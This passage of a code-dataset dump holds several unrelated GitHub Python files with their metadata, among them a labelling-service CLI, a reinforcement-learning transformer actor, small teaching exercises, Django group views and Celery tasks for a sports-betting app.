type=str)\nparser.add_argument(\"--create-dataset-row-from-image\", default=argparse.SUPPRESS, nargs=1, type=str)\n\nparser.add_argument(\"--connect-dataset-to-project\", default=argparse.SUPPRESS, nargs=1)\n\n# TODO: add argparse support to the module\n# TODO: https://github.com/talha888/smartlabel/issues/1\n\ndef get_token():\n if not os.path.exists(CONFIG_FILE_PATH):\n return False\n try:\n with open(CONFIG_FILE_PATH, 'r') as f:\n token = json.load(f)\n return token['token']\n except Exception as e:\n return False\n\ndef main():\n args, leftovers = parser.parse_known_args()\n \n if hasattr(args, 'logout'):\n result = input(\"Are you sure? 
[Y/N]\")\n result = result.lower()\n if result == 'y' or result == 'yes':\n rmtree(CONFIG_FILE_FOLDER)\n else:\n print('Could not logout.')\n sys.exit(0)\n\n\n token = get_token()\n if not token:\n if hasattr(args, 'login'):\n try:\n key, seceret = args.login\n result = requests.post(f\"{API_URL}/get_token\", json={\"API_KEY\": key, \"API_SECERET\": seceret})\n token = json.loads(result.text)\n data = {\"API_KEY\": key, \"API_SECERET\": seceret, 'token': token['token']}\n if not os.path.exists(CONFIG_FILE_PATH):\n os.mkdir(join(home, '.smartlabel'))\n with open(CONFIG_FILE_PATH, 'w') as f:\n json.dump(data, f)\n print('Welcome --- ')\n sys.exit(0) \n except Exception as e:\n print('ERROR', e)\n \n print('Use --login to create a token so you can communicate with serer.')\n sys.exit(0)\n \n headers = {'x-access-token': token}\n if hasattr(args, 'list_projects'):\n if args.list_projects is None:\n try:\n res = requests.get(f\"{API_URL}/list_projects\", headers=headers)\n project_list = json.loads(res.text)\n print(project_list)\n except Exception as e:\n pass\n # project = Project()\n # table, columns= project.get_projects()\n # if table != 0:\n # output = tabulate(table, columns , tablefmt=\"psql\")\n # print(output)\n # else:\n # print(\"-----------------NO RECORD FOUND-----------------\")\n else:\n parser.print_help\n\n elif hasattr(args, 'get_project'):\n Id = args.get_project\n project = Project()\n table, columns= project.get_project(Id)\n if table != 0:\n output = tabulate(table, columns , tablefmt=\"psql\")\n print(output)\n else:\n print(\"-----------------TRY WITH VALID ID-----------------\")\n \n elif hasattr(args, 'create_project'):\n if args.create_project is not None:\n Createdby,DatasetId, Name, Description, Status, Role = input(\"Enter the following data Createdby,DatasetId, Name, Description, Status, Role: \").split() \n project = Project()\n project.create_project(Createdby,DatasetId, Name, Description, Status, Role)\n else:\n print(\"-----------------Invalid entry-----------------\")\n \n elif hasattr(args, 'create_dataset'):\n # TODO: list create a new dataset and return a line with its meta data.\n print(args)\n elif hasattr(args, 'create_dataset_row_from_csv'):\n # TODO: list create a new dataset and return a line with its meta data.\n print('all files have been uploaded to dataset')\n\n\nif __name__ == '__main__':\n main()","repo_name":"talha888/smartlabel","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34132983565","text":"class Kolor:\n\n #opis stanu - konstruktor klasy\n def __init__(self,id,nazwa):\n self.idkoloru = id # zmienna -> parametr\n self.nazwa = nazwa\n self.paleta = \"paleta A\"\n\n #zachowane-funkcje klasy -> metody\n\n def print_kolor(self):\n print(f'kolor: {self.nazwa}, id koloru: {self.idkoloru}, paleta: {self.paleta}')\n\n\nk1 = Kolor(2,\"czerwony\")\nk1.print_kolor()\n\nk2 = Kolor(99,\"czarny\")\nk2.paleta = \"paleta X\"\nk2.print_kolor()\n\nk1.print_kolor()\n","repo_name":"albim72/PYTHON_PODSTAWY_99","sub_path":"OBIEKTY/kolory.py","file_name":"kolory.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5571147340","text":"import math\nimport torch\nimport torch.nn as nn\nimport transformers\n\nfrom config import cfg\nfrom utils import model as tu\nfrom algos.transformer.transformer_layer import 
TransformerEncoderLayerResidual, TransformerDecoderLayer\nfrom algos.transformer.decoder import TransformerDecoder\nfrom algos.transformer.encoder import TransformerEncoder\nfrom algos.gpt2.gpt2_model import GPT2Model\n\nclass MetamorphformerActor(nn.Module):\n def __init__(self, model_args, limb_embeders, pos_embedders, timestep_embeder, morphology_encoder, extreo_embeders=None, method='metamorphformer', device=None):\n super(MetamorphformerActor, self).__init__()\n self.device = device\n self.method = method\n self.model_args = model_args\n\n self.envs = self.model_args.envs\n self.morph_emb_dim = self.model_args.morph_emb_dim\n self.latent_emb_dim = self.model_args.latent_emb_dim\n #print('self.latent_emb_dim = %i in actor' % self.latent_emb_dim)\n\n self.nums_joint, self.dims_proprioceptive, self.dims_bodypart_proprioceptive, self.dims_exteroceptive, self.dims_action, self.dims_bodypart_act = self.model_args.dim_specs\n\n self.limb_embeders = limb_embeders\n self.extreo_embeders = extreo_embeders\n self.pos_embedders = pos_embedders\n self.timestep_embeder = timestep_embeder\n self.morphology_encoder = morphology_encoder\n\n # task-specific modules\n self.limb_act_embeders = nn.ModuleDict({\n 'unimal': nn.Linear(self.dims_bodypart_act['unimal'], self.morph_emb_dim),\n 'walker': nn.Linear(self.dims_bodypart_act['walker'], self.morph_emb_dim),\n 'ant': nn.Linear(self.dims_bodypart_act['ant'], self.morph_emb_dim),\n 'walker2d': nn.Linear(self.dims_bodypart_act['walker2d'], self.morph_emb_dim),\n 'halfcheetah': nn.Linear(self.dims_bodypart_act['halfcheetah'], self.morph_emb_dim),\n 'swimmer': nn.Linear(self.dims_bodypart_act['swimmer'], self.morph_emb_dim),\n 'reacher': nn.Linear(self.dims_bodypart_act['reacher'], self.morph_emb_dim),\n 'hopper': nn.Linear(self.dims_bodypart_act['hopper'], self.morph_emb_dim),\n 'humanoid': nn.Linear(self.dims_bodypart_act['humanoid'], self.morph_emb_dim)\n })\n self.action_projectors = nn.ModuleDict({\n 'unimal': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['unimal']], final_nonlinearity=False, ),\n 'walker': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['walker']], final_nonlinearity=False, ),\n 'ant': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['ant']], final_nonlinearity=False, ),\n 'walker2d': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['walker2d']], final_nonlinearity=False, ),\n 'halfcheetah': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['halfcheetah']], final_nonlinearity=False, ),\n 'swimmer': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['swimmer']], final_nonlinearity=False, ),\n 'reacher': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['reacher']], final_nonlinearity=False, ),\n 'hopper': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['hopper']], final_nonlinearity=False, ),\n 'humanoid': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['humanoid']], final_nonlinearity=False, )\n })\n self.obs_projectors = nn.ModuleDict({\n 'unimal': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['unimal']], final_nonlinearity=False, ),\n 'walker': tu.make_mlp_default([self.latent_emb_dim] + 
self.model_args.DECODER_DIMS + [self.dims_proprioceptive['walker']], final_nonlinearity=False, ),\n 'ant': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['ant']], final_nonlinearity=False, ),\n 'walker2d': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['walker2d']], final_nonlinearity=False, ),\n 'halfcheetah': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['halfcheetah']], final_nonlinearity=False, ),\n 'swimmer': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['swimmer']], final_nonlinearity=False, ),\n 'reacher': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['reacher']], final_nonlinearity=False, ),\n 'hopper': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['hopper']], final_nonlinearity=False, ),\n 'humanoid': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['humanoid']], final_nonlinearity=False, )\n })\n self.morphology_to_pose_projectors = nn.ModuleDict({\n 'unimal': tu.make_mlp_default([self.nums_joint['unimal']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'walker': tu.make_mlp_default([self.nums_joint['walker']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'ant': tu.make_mlp_default([self.nums_joint['ant']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'walker2d': tu.make_mlp_default([self.nums_joint['walker2d']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'halfcheetah': tu.make_mlp_default([self.nums_joint['halfcheetah']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'swimmer': tu.make_mlp_default([self.nums_joint['swimmer']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'reacher': tu.make_mlp_default([self.nums_joint['reacher']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'hopper': tu.make_mlp_default([self.nums_joint['hopper']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'humanoid': tu.make_mlp_default([self.nums_joint['humanoid']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, )\n })\n\n # shared modules\n self.s_a_cross = True\n if self.s_a_cross:\n self.decoder_layer = TransformerDecoderLayer(self.morph_emb_dim, self.model_args.NHEAD, self.model_args.DIM_FEEDFORWARD, self.model_args.DROPOUT)\n self.morphology_decoder = TransformerDecoder(self.decoder_layer, 1, norm=None, )\n\n self.ln_w_current_pose = True\n #if self.ln_w_current_pos:\n # self.seq_t_linear_weighter = nn.Linear(2 * self.morph_len * decoder_out_dim, self.morph_len * decoder_out_dim) # 52 => 128\n\n if cfg.MODEL.TIME_SEQ_MODEL == 'OrgEncoder':\n latent_encode_layer = TransformerEncoderLayerResidual(2 * self.latent_emb_dim, self.model_args.NHEAD, self.model_args.DIM_FEEDFORWARD, self.model_args.DROPOUT)\n self.latent_encoder = TransformerEncoder(latent_encode_layer, 1, norm=None, )\n elif 
cfg.MODEL.TIME_SEQ_MODEL == 'GPT2':\n if transformers.__version__ == '4.5.1':\n GPT2config = transformers.GPT2Config(\n vocab_size=1, # doesn't matter -- we don't use the vocab\n n_embd=2 * self.latent_emb_dim,\n n_layer=1,\n n_head=self.model_args.NHEAD,\n n_inner=4 * self.latent_emb_dim,\n activation_function='relu',\n n_positions=1024,\n resid_pdrop=self.model_args.DROPOUT,\n attn_pdrop=self.model_args.DROPOUT,\n # **kwargs\n )\n else:\n GPT2config = transformers.GPT2Config(\n vocab_size=1, # doesn't matter -- we don't use the vocab\n n_embd=2 * self.latent_emb_dim,\n n_layer=1,\n n_head=self.model_args.NHEAD,\n n_inner=4 * self.latent_emb_dim,\n activation_function='relu',\n n_ctx=1024,\n resid_pdrop=self.model_args.DROPOUT,\n attn_pdrop=self.model_args.DROPOUT,\n # **kwargs\n )\n self.latent_encoder = GPT2Model(GPT2config)\n else:\n raise NotImplementedError\n\n if cfg.MODE != 'pretrain' and cfg.MODEL.ACTOR_CRITIC_SHARE:\n self.value_projector = tu.make_mlp_default([self.morph_emb_dim] + self.model_args.DECODER_DIMS + [1], final_nonlinearity=False, ) # [128, J]\n\n # init weights\n self.init_weights()\n return\n\n def init_weights(self):\n initrange = self.model_args.EMBED_INIT\n\n for env in self.envs:\n self.limb_act_embeders[env].weight.data.uniform_(-initrange, initrange)\n\n #if self.ln_w_current_pose:\n # self.seq_t_linear_weighter.weight.data.uniform_(-initrange, initrange)\n\n initrange = self.model_args.DECODER_INIT\n for env in self.envs:\n self.action_projectors[env][-1].weight.data.uniform_(-initrange, initrange)\n self.action_projectors[env][-1].bias.data.zero_()\n\n self.obs_projectors[env][-1].weight.data.uniform_(-initrange, initrange)\n self.obs_projectors[env][-1].bias.data.zero_()\n\n # self.morphology_to_pose_projectors[env][-1].weight.data.uniform_(-initrange, initrange)\n # self.morphology_to_pose_projectors[env][-1].bias.data.zero_()\n\n if cfg.MODE != 'pretrain' and cfg.MODEL.ACTOR_CRITIC_SHARE:\n self.value_projector[-1].weight.data.uniform_(-initrange, initrange)\n self.value_projector[-1].bias.data.zero_()\n\n return\n\n\n def encode_morphology(self, embeder, pos_embedder, morphology_to_pose_projector, num_joint, inputs, mask=None, seq_mask=None):\n '''\n encode the morphology\n :param inputs: shape=[num_samples,num_joints*nvar_per_joint]\n :param masks: shape=[num_samples,num_joints*nvar_per_joint]\n :return: morphology_embed, shape=[num_limbs,batch_size,embed_dim]\n '''\n if mask is not None:\n inputs = (1.0 - mask)*inputs\n morph_inputs = inputs.reshape(inputs.shape[0], num_joint, -1).permute(1, 0, 2) # shape = [num_sample, num_joint, nvar_per_joint] => [num_joint, num_sample, nvar_per_joint]\n\n morph_embed = embeder(morph_inputs) * math.sqrt(self.morph_emb_dim) # [num_joint, num_sample, nvar_per_joint] -> [num_joint, num_sample, emb_dim]\n morph_embed = pos_embedder(morph_embed) # shape = [num_joint, num_sample, emb_dim]\n\n if seq_mask is not None:\n seq_mask = seq_mask.bool()\n pre_pose_embed = self.morphology_encoder(morph_embed, src_key_padding_mask=seq_mask).permute(1, 0, 2) # shape = [num_joint, num_sample, morph_emb_dim] => [num_sample, num_joint, morph_emb_dim]\n pose_embed = pre_pose_embed.reshape(pre_pose_embed.shape[0], -1) # shape = [num_sample, num_joint*morph_emb_dim]\n pose_embed = morphology_to_pose_projector(pose_embed) # shape = [num_sample, latent_emb_dim]\n return pose_embed, pre_pose_embed\n\n def forward(self, proprioceptive, exteroceptive, act_prev, rew_prev, obs_mask=None, act_mask=None, obs_joint_mask=None, act_joint_mask=None, 
timemask=None, timestep=None, env=None):\n '''\n\n :param proprioceptive: shape = [batch_size, T, dim_proprioceptive]\n :param exteroceptive: shape = [batch_size, T, dim_exteroceptive]\n :param act_prev: shape = [batch_size, T, dim_action]\n :param rew_prev: shape = [batch_size, T, 1]\n :param obs_mask: shape = [batch_size, T, dim_proprioceptive]\n :param act_mask: shape = [batch_size, T, dim_action]\n :param obs_joint_mask: shape = [batch_size, T, num_joint]\n :param act_joint_mask: shape = [batch_size, T, num_joint]\n :param timemask: shape = [batch_size, T]\n :param timestep: shape = [batch_size, T]\n :return:\n '''\n has_exteroceptive = exteroceptive is not None and exteroceptive.shape[-1] > 0\n\n for the_env in self.envs:\n if the_env == env:\n self.limb_embeders[the_env].train()\n self.pos_embedders[the_env].train()\n self.limb_act_embeders[the_env].train()\n self.action_projectors[the_env].train()\n self.obs_projectors[the_env].train()\n self.morphology_to_pose_projectors[the_env].train()\n if has_exteroceptive:\n self.extreo_embeders[the_env].train()\n else:\n self.extreo_embeders[the_env].eval()\n else:\n self.limb_embeders[the_env].eval()\n self.pos_embedders[the_env].eval()\n self.limb_act_embeders[the_env].eval()\n self.action_projectors[the_env].eval()\n self.obs_projectors[the_env].eval()\n self.morphology_to_pose_projectors[the_env].eval()\n self.extreo_embeders[the_env].eval()\n\n batch_size = proprioceptive.shape[0]\n window_size = proprioceptive.shape[1]\n\n proprioceptive_all = proprioceptive.reshape(batch_size * window_size, proprioceptive.shape[-1])\n obs_mask_all = obs_mask.reshape(batch_size * window_size, obs_mask.shape[-1]) if obs_mask is not None else None\n obs_joint_mask_all = obs_joint_mask.reshape(batch_size * window_size, obs_joint_mask.shape[-1]) if obs_joint_mask is not None else None\n pose_embed_proprioceptive_all, pre_pose_embed_proprioceptive_all = self.encode_morphology(self.limb_embeders[env], self.pos_embedders[env], self.morphology_to_pose_projectors[env], self.nums_joint[env], proprioceptive_all, obs_mask_all, obs_joint_mask_all) # shape = [batch_size*window_size, num_joints, morph_emb_dim]\n pose_embed_proprioceptive = pose_embed_proprioceptive_all.reshape(batch_size, window_size, self.latent_emb_dim) # shape = [batch_size, window_size, latent_emb_dim]\n pre_pose_embed_proprioceptive = pre_pose_embed_proprioceptive_all.reshape(batch_size, window_size, self.nums_joint[env], self.morph_emb_dim)\n\n act_prev_all = act_prev.reshape(batch_size * window_size, act_prev.shape[-1])\n act_mask_all = act_mask.reshape(batch_size * window_size, act_mask.shape[-1]) if act_mask is not None else None\n act_joint_mask_all = act_joint_mask.reshape(batch_size * window_size, act_joint_mask.shape[-1]) if act_joint_mask is not None else None\n pose_embed_act_prev_all, _ = self.encode_morphology(self.limb_act_embeders[env], self.pos_embedders[env], self.morphology_to_pose_projectors[env], self.nums_joint[env], act_prev_all, act_mask_all, act_joint_mask_all) # shape = [batch_size*window_size, num_joints, morph_emb_dim]\n pose_embed_act_prev = pose_embed_act_prev_all.reshape(batch_size, window_size, self.latent_emb_dim) # shape = [batch_size, window_size, latent_emb_dim]\n\n z_a = pose_embed_act_prev\n z_s = pose_embed_proprioceptive\n\n # exteroceptive\n if not cfg.MODEL.EXTERO_BLIND and has_exteroceptive:\n pose_embed_exteroceptive = self.extreo_embeders[env](exteroceptive)\n z_s += pose_embed_exteroceptive\n\n s_a_joint_dim = -2\n nvar_timestep = 2 # s and a\n z = 
torch.cat([z_a.unsqueeze(s_a_joint_dim), z_s.unsqueeze(s_a_joint_dim)], dim=s_a_joint_dim) # shape = [batch_size, window_size, nvar_timestep, latent_emb_dim]\n\n if cfg.MODEL.USE_TIMESTEPS and self.timestep_embeder is not None:\n time_embeddings = self.timestep_embeder(timestep.int()).unsqueeze(2) # shape = [batch_size, window_size] => [batch_size, window_size, latent_emb_dim] => [batch_size, window_size, num_joint, 1, latent_emb_dim]\n z = z + time_embeddings # shape = [window_size, batch_size, num_joints, nvar_timestep, latent_emb_dim]\n\n decoder_input = z.reshape(batch_size, window_size, -1) # shape = [ batch_size, window_size, nvar_timestep*latent_emb_dim]\n\n if cfg.MODEL.TIME_SEQ_MODEL == 'OrgEncoder':\n latent_attn_mask = None # some issue with latent_attn_mask\n decoder_output = self.latent_encoder(decoder_input.permute(1, 0, 2), mask=latent_attn_mask, src_key_padding_mask=timemask.float()) # [T, 32, 12*2*128] => [T, 32, 12*2*128]\n decoder_output = decoder_output.permute(1, 0, 2) # [T, 32, 12, 2, 128]\n elif cfg.MODEL.TIME_SEQ_MODEL == 'GPT2':\n decoder_outputs = self.latent_encoder(inputs_embeds=decoder_input, attention_mask=1.0-timemask.float()) # TODO reverse mask definition in GPT2Model!!!\n decoder_output = decoder_outputs['last_hidden_state'] # shape = [batch_size, window_size, nvar_timestep*latent_emb_dim]\n else:\n raise NotImplementedError\n decoder_output = decoder_output.reshape(batch_size, window_size, nvar_timestep, self.latent_emb_dim) # shape = [batch_size, window_size, nvar_timestep, latent_emb_dim]\n\n z_a_out = decoder_output[:, :, 0, :] # shape = [batch_size, window_size, latent_emb_dim]\n z_s_out = decoder_output[:, :, 1, :] # shape = [batch_size, window_size, latent_emb_dim]\n\n # from a_prev to s\n obs_preds = self.obs_projectors[env](z_a_out) # shape = [batch_size, window_size, dim_proprioceptive]\n if obs_mask is not None:\n obs_preds = (1.0 - obs_mask) * obs_preds\n # from s to a\n action_preds = self.action_projectors[env](z_s_out) # shape = [batch_size, window_size, dim_action]\n if act_mask is not None:\n action_preds = (1.0 - act_mask) * action_preds\n\n if cfg.MODE != 'pretrain' and cfg.MODEL.ACTOR_CRITIC_SHARE:\n value_preds = self.value_projector(pre_pose_embed_proprioceptive).reshape(batch_size, window_size, -1) # shape = [batch_size, window_size, num_joints, 1] => [batch_size, window_size, num_joints]\n if act_joint_mask is not None:\n value_preds = (1.0 -act_joint_mask) * value_preds\n return action_preds, obs_preds, value_preds\n return action_preds, obs_preds\n","repo_name":"AaronJi/OnlineDecisionMetaMorphFormer","sub_path":"algos/metamorphformer/metamorphformer_actor.py","file_name":"metamorphformer_actor.py","file_ext":"py","file_size_in_byte":18979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6357490832","text":"#Exercício Python 63: Escreva um programa que leia um número N inteiro qualquer e mostre na tela os N primeiros elementos de uma Sequência de Fibonacci\nprint('Sequencia de fibonacci')\ncont = 3\nn = int(input('Digite qauntos termos voce quer mostrar:'))\nt1 = 0\nt2 = 1\nt3 = t1 + t2\nprint(t1,t2,end=' ')\nwhile cont != n:\n cont +=1\n print('{}'.format(t3),end=' ')\n t1 = t2\n t2 = t3\n t3 = t1 + t2\n","repo_name":"RafaelVelhoGarcia/study-exercice-py","sub_path":"ex063.py","file_name":"ex063.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"12530666982","text":"import unittest\n\nfrom src.Caesar import Caesar\n\nclass TestCaesar(unittest.TestCase):\n\n def test_cipher(self):\n M = \"hello world !!!\"\n K = 125\n caesar = Caesar(K)\n self.assertNotEqual(caesar.cipher(M), M)\n\n def test_decipher(self):\n M = \"hello world 33 45 #ÉÉ~~^$!!!\"\n K = 213\n caesar = Caesar(K)\n self.assertEqual(caesar.decipher(caesar.cipher(M)), M)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ntnprdhmm/cryptology","sub_path":"tests/test_caesar.py","file_name":"test_caesar.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3472221045","text":"\n\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n# для группы премиум\nfrom django.shortcuts import redirect \nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth.decorators import login_required\n\nfrom news.models import *\nfrom news.views import *\n\n\nclass IndexView(LoginRequiredMixin, TemplateView):\n template_name = 'protect/index_user.html'# Create your views here.\n \n \n \n \n # определение есть ли пользователь в группе\n # получаем весь контекст\n # exists() выберет из всего контекста пользователя со всеми его группами если есть премиум\n # но not переворачивает наоборот\n \n \n def get_context_data(self, **kwargs):\n context = super().get_context_data( **kwargs)\n \n \n context['is_not_premium'] = not self.request.user.groups.filter(name = 'premium').exists()\n context['is_not_authors'] = not self.request.user.groups.filter(name = 'authors').exists()\n \n\n #список текущих подписок юзера\n sub = Category.objects.order_by('name').filter(subscribers=self.request.user)\n context['sub'] = sub\n #список категорий без подписки \n context['sub_not'] = Category.objects.order_by('name').exclude(subscribers=self.request.user) \n return context\n \n\n\n \n \n \n \n \n\n\n# Добавляем функциональное представление в группу премиум\n@login_required # декоратор проверки аунтентификации группа премиум\ndef upgrade_me(request):\n user = request.user\n premium_group = Group.objects.get(name='premium')\n if not request.user.groups.filter(name='premium').exists():\n premium_group.user_set.add(user)\n else:\n premium_group.user_set.remove(user) \n return redirect('protect:personal')\n\n\n@login_required # группа авторы и с включением в модель Авторы\ndef upauthors(request):\n user = request.user\n authors_group = Group.objects.get(name='authors')\n if not request.user.groups.filter(name='authors').exists():\n \n authors_group.user_set.add(user)\n Author.objects.create(authorUser=user)\n else:\n authors_group.user_set.remove(user)\n Author.objects.get(authorUser=user).delete()\n \n return redirect('protect:personal')\n\n","repo_name":"VetN/moduleD2_homework","sub_path":"NewsPaper/protect/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4907263367","text":"# Importing section\nimport json\n\nimport requests\nimport argparse\nimport logging\n\nfrom classes.pm_sidechain_interface import PMSidechainInterface\n\n# Main\nif __name__ == \"__main__\":\n arg_parser = argparse.ArgumentParser()\n arg_parser.add_argument('-c', help='config file')\n arg_parser.add_argument('-l', help='log file')\n\n args = arg_parser.parse_args()\n cfg = 
json.loads(open(args.c).read())\n\n # Get configuration about connections to InfluxDB and remote service related to data retrieving\n tmp_config = json.loads(open(cfg['connectionsFile']).read())\n cfg.update(tmp_config)\n\n # set logging object\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n if not args.l:\n log_file = None\n else:\n log_file = args.l\n\n logger = logging.getLogger()\n logging.basicConfig(format='%(asctime)-15s::%(threadName)s::%(levelname)s::%(funcName)s::%(message)s',\n level=logging.INFO, filename=log_file)\n\n url_prefix = cfg['sidechainRestApi']\n headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}\n\n logger.info('Starting program')\n\n # Calculate the values\n cmd_request = '%s/energyPrices' % url_prefix\n\n logger.info('Request: %s' % cmd_request)\n r = requests.get(cmd_request)\n data = json.loads(r.text)\n logger.info('Response: %s' % data)\n\n logger.info('Ending program')\n","repo_name":"supsi-dacd-isaac/parity-sidechain-interface","sub_path":"scripts/pm/energy_price_calculator.py","file_name":"energy_price_calculator.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19286604612","text":"import requests\n\nfrom celery import Celery\nfrom celery import shared_task\nfrom django.conf import settings\nfrom datetime import datetime, timedelta\nfrom pytz import timezone, utc\nfrom random import randint\n\nfrom accounts.models import User\nfrom .models import CurrentDate, Game, Player, Line, Pick, Subline\nfrom sendgrid.helpers.mail import Mail\nfrom sendgrid import SendGridAPIClient\nfrom django.utils import dateformat\n\napp = Celery()\n\n# Every half hour, pull up all games that are happening now.\n# For each game, for each attached line, make every attached\n# subline invisible.\n@shared_task\ndef remove_lines_when_game_starts():\n # Add current PST time to the system date\n cd = CurrentDate.objects.first().date\n date = datetime.now(tz=utc)\n time = date.astimezone(timezone(\"US/Pacific\")).time()\n dt = datetime.combine(cd, time)\n\n # For debugging\n # dt = dt.replace(hour=19, minute=0)\n\n for game in Game.objects.all():\n # Check m/d/y & h:m\n if (\n game.pst_gametime.date() == dt.date()\n and game.pst_gametime.hour == dt.hour\n and game.pst_gametime.minute == dt.minute\n ):\n for line in game.line_set.all():\n line.subline_set.all().update(visible=False)\n\n\n# Every midnight PST, set balance of free to play users to $100\n@shared_task\ndef top_off_free_to_play_user_balances():\n User.objects.filter(free_to_play=True).update(wallet_balance=100)\n\n\n# every hour, get the players' scores and save them.\n# TODO - just run once\n@shared_task\ndef update_player_scores():\n headers = {\"Ocp-Apim-Subscription-Key\": f\"{settings.FANTASY_DATA_API_KEY}\"}\n cd = CurrentDate.objects.first()\n formatted_date = cd.date.strftime(\"%Y-%m-%d\")\n\n r = requests.get(\n f\"https://fly.sportsdata.io/api/nba/fantasy/json/PlayerGameStatsByDate/{formatted_date}\",\n headers=headers,\n )\n data = r.json()\n\n todays_games = []\n for game in Game.objects.all():\n if game.pst_gametime.date() == cd.date:\n todays_games.append(game)\n\n # Find player in our system. Find game they played in today.\n # Find all lines connected to that. 
Update each subline's actual pts\n for record in data:\n try:\n player = Player.objects.get(name=record[\"Name\"])\n\n todays_game = None\n for game in todays_games:\n if player.team == game.home_team or player.team == game.away_team:\n todays_game = game\n break\n\n if not todays_game:\n raise Exception()\n\n lines = Line.objects.filter(player=player, game=game)\n for line in lines:\n if line.category.category == \"Points\":\n line.actual_value = record[\"Points\"]\n line.save()\n elif line.category.category == \"Rebounds\":\n line.actual_value = record[\"Rebounds\"]\n line.save()\n elif line.category.category == \"Assists\":\n line.actual_value = record[\"Assists\"]\n line.save()\n elif line.category.category == \"Fantasy Points\":\n line.actual_value = record[\"FantasyPoints\"]\n line.save()\n\n except Exception as e:\n print(e)\n print(\"Error with updating player score OR player didn't play today\")\n\n\n# This runs at noon PST everyday\n# For yesterday, find all slips created and send emails.\n# In each email, send outcome of the slip and if new lines exist for today, a preview of those\n@shared_task\ndef send_slip_emails():\n today = datetime.now().date()\n yesterday = today - timedelta(days=1)\n\n # Find all the games for yesterday. Find all the lines that roll up those\n # games. Find all the slips attached to those lines.\n games = Game.objects.filter(datetime__date=yesterday)\n yesterdays_picks = Pick.objects.filter(\n subline__line__game__datetime__date=yesterday\n )\n\n yesterdays_slips = []\n for pick in yesterdays_picks:\n if pick.slip not in yesterdays_slips:\n yesterdays_slips.append(pick.slip)\n\n users_with_slips_yesterday = {}\n for slip in yesterdays_slips:\n if slip.owner.id not in users_with_slips_yesterday:\n users_with_slips_yesterday[slip.owner.id] = []\n users_with_slips_yesterday[slip.owner.id].append(slip)\n\n # Find all the sub lines for today\n today_sublines = Subline.objects.filter(\n line__game__datetime__date=today, visible=True\n )\n\n today_lines = []\n if today_sublines.count():\n first_subline = today_sublines[randint(0, today_sublines.count() - 1)]\n second_subline = today_sublines[randint(0, today_sublines.count() - 1)]\n third_subline = today_sublines[randint(0, today_sublines.count() - 1)]\n\n today_lines = [\n {\n \"src\": first_subline.line.player.headshot_url,\n \"name\": str(first_subline.line.player),\n \"game\": str(first_subline.line.game),\n \"projection\": f\"{str(round(first_subline.projected_value, 1))} {first_subline.line.category.category}\",\n },\n {\n \"src\": second_subline.line.player.headshot_url,\n \"name\": str(second_subline.line.player),\n \"game\": str(second_subline.line.game),\n \"projection\": f\"{str(round(second_subline.projected_value, 1))} {second_subline.line.category.category}\",\n 